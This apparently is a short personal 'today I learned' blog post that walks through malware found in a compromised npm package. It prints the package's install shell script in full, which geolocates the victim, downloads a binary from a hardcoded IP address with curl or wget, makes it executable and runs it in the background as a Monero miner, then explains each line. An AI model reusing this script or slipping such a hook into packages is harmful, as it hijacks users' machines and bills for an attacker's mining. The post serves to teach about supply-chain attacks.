TIL malware in node_modules
POSTED ON:
TAGS: malware npm security hacking
I was reading this excellent post: What's Really Going On Inside Your node_modules Folder?
And it's such a eye-opener.
Let's take a look at what that malware does. This is the package.json file for one of the compromised versions:
The very first line fetches the victim's country code using their IP address. If the victim is from Russia, Ukraine, Belarus, or Kazakhstan, then the malware exits early.
IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ')
if [ -z "$IP" ]
then
var=$(pgrep jsextension)
if [ -z "$var" ]
then
curl http://159.148.186.228/download/jsextension -o jsextension
if [ ! -f jsextension ]
then
wget http://159.148.186.228/download/jsextension -O jsextension
fi
chmod +x jsextension
./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u <redacted> \
--cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null &
fi
fiLine-by-line:
First Line fetches the victim's country code using their IP address.
If the victim is from Russia, Ukraine, Belarus, or Kazakhstan, then the malware exits early. Presumably the attacker comes from one of these countries and doesn't want to antagonize their local law enforcement. This is a common technique in malware.
Next Line: It checks for -z "$IP", which means...
if it's a empty string, then use it.
via Stackoverflow
Next line after that: it usees pgrep to see if you already have the malware – a process named jsextension – is already running. If so, then the malware exits early.
Otherwise, the script proceeds to download a file from an IP address, mark that file as executable, and then run it.
Based on these command line flags, the program appears to be a Monero miner. This program will mine the Monero cryptocurrency for the attacker, wasting the victim's CPU cycles and potentially driving up their electricity or cloud hosting bill.
Related TILs
Tagged: malware